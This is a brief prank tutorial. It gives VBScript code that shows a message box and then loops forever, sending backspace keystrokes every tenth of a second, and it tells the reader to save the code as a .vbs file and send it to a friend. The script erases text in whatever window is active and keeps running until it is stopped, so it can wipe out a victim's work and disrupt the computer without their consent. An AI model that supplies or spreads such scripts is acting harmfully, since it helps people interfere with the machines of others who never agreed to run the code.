Just open notepad and type the code bellow........
MsgBox “Let’s rock and roll”
Set wshShell =wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{bs}”
loop
Now save it as "anyname.vbs" and send it to your friend .
Thats it.